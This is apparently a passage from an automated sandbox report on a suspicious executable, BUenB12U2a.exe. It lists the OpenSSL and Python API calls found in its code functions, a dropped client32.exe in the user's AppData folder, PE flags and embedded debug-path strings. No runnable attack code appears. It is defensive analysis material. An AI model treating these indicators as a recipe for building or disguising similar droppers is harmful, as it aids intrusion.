                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761646 EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_id,EVP_PKEY_get_id,EVP_PKEY_get_id,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,EVP_DigestVerify,ERR_new,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,1_2_00007FFE00761646
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007BF660 CRYPTO_free,CRYPTO_memdup,1_2_00007FFE007BF660
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762522 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE00762522
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076F7F0 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,1_2_00007FFE0076F7F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007611DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFE007611DB
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007619E7 CRYPTO_free,1_2_00007FFE007619E7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076162C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,1_2_00007FFE0076162C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D7820 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_new,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE007D7820
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0078D750 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFE0078D750
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076108C ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFE0076108C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B7770 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE007B7770
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761582 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFE00761582
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D9790 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,1_2_00007FFE007D9790
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007797B0 CRYPTO_free,CRYPTO_strdup,1_2_00007FFE007797B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,1_2_00007FFE00761B18
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762590 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFE00762590
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE00761B31
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007BF8F0 CRYPTO_free,CRYPTO_strndup,1_2_00007FFE007BF8F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761846 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,OPENSSL_sk_num,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,1_2_00007FFE00761846
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C9850 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007C9850
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076586A BIO_get_data,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,1_2_00007FFE0076586A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00785870 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00785870
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C38A0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,1_2_00007FFE007C38A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076204A CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFE0076204A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007859F0 CRYPTO_free,CRYPTO_free,1_2_00007FFE007859F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00775A10 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,1_2_00007FFE00775A10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761A16 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFE00761A16
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076271B CRYPTO_free,CRYPTO_strdup,1_2_00007FFE0076271B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761D84 CRYPTO_free,CRYPTO_memdup,1_2_00007FFE00761D84
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00777980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,1_2_00007FFE00777980
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076107D CRYPTO_free,1_2_00007FFE0076107D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007623EC CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFE007623EC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007613D9 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,1_2_00007FFE007613D9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00785AE0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00785AE0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007ADAF0 CRYPTO_free,1_2_00007FFE007ADAF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00775B10 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,1_2_00007FFE00775B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C5B10 EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFE007C5B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00773B30 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFE00773B30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B7A40 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE007B7A40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761C53 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFE00761C53
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076222A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFE0076222A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076267B CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFE0076267B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007623E7 CRYPTO_free,CRYPTO_memdup,1_2_00007FFE007623E7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761CEE CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,1_2_00007FFE00761CEE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076150F OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,1_2_00007FFE0076150F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761361 CRYPTO_malloc,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,ERR_pop_to_mark,CRYPTO_free,EVP_PKEY_free,1_2_00007FFE00761361
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007ADB60 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007ADB60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007CBB70 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE007CBB70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B7CD0 CRYPTO_memcmp,1_2_00007FFE007B7CD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761F37 CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFE00761F37
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007619DD BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,CRYPTO_free,CRYPTO_strdup,1_2_00007FFE007619DD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00785CF0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,d2i_X509,X509_get0_pubkey,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00785CF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761F50 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFE00761F50
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C3D30 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,1_2_00007FFE007C3D30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761CBC EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE00761CBC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00765C53 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_set_data,BIO_clear_flags,1_2_00007FFE00765C53
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761CE9 memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE00761CE9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00775D80 CRYPTO_THREAD_run_once,1_2_00007FFE00775D80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007615E6 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,memcpy,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE007615E6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076DEC0 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE0076DEC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0077BEC0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFE0077BEC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D9F10 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007D9F10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076236F CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE0076236F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007616A4 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007616A4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00781E60 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,1_2_00007FFE00781E60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00765E80 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,1_2_00007FFE00765E80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007624E6 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFE007624E6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00763EB0 CRYPTO_free,1_2_00007FFE00763EB0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076103C CRYPTO_malloc,COMP_expand_block,1_2_00007FFE0076103C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00794000 CRYPTO_realloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00794000
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761AC3 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,1_2_00007FFE00761AC3
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762027 CRYPTO_free,1_2_00007FFE00762027
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761EDD CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,EVP_MD_get0_name,EVP_MD_is_a,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFE00761EDD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D1F70 CRYPTO_memcmp,1_2_00007FFE007D1F70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761D8E EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_MAC_init,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFE00761D8E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076DFB2 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,1_2_00007FFE0076DFB2
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11516198 CRYPTO_memcmp,1_2_00007FFE11516198
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE115118E0 _Py_NoneStruct,_PyArg_UnpackKeywords,PyObject_GetBuffer,PyBuffer_IsContiguous,PyObject_GetBuffer,PyBuffer_IsContiguous,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,EVP_PBE_scrypt,PyBytes_FromStringAndSize,PyEval_SaveThread,EVP_PBE_scrypt,PyEval_RestoreThread,PyExc_ValueError,PyErr_SetString,PyBuffer_Release,PyBuffer_Release,PyLong_AsLong,PyErr_Occurred,PyLong_AsLong,PyErr_Occurred,PyExc_ValueError,PyExc_ValueError,PyErr_Format,_PyArg_BadArgument,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_OverflowError,PyExc_OverflowError,_Py_Dealloc,PyExc_ValueError,1_2_00007FFE115118E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA4FF0 ASN1_STRING_type,ASN1_STRING_length,ASN1_STRING_get0_data,_Py_BuildValue_SizeT,ASN1_STRING_to_UTF8,_Py_Dealloc,_Py_BuildValue_SizeT,CRYPTO_free,1_2_00007FFE11EA4FF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA4D64 i2d_X509,PyBytes_FromStringAndSize,CRYPTO_free,1_2_00007FFE11EA4D64
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeFile opened: C:\Users\user\AppData\Roaming\extracted\MSVCR100.dllJump to behavior
                                Source: BUenB12U2a.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716385209.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713321376.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1799122999.000002101120B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799328127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.0000021011130000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.00000210111CB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: BUenB12U2a.exe, 00000001.00000002.1971040442.00007FFE01428000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1712987011.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715337207.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715953298.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713884666.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716027866.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713533133.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713680258.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715858737.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: BUenB12U2a.exe, 00000001.00000002.1973327452.00007FFE13310000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715953298.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714111041.0000021D68869000.00000004.00000020.00020000.00000000.sdmp
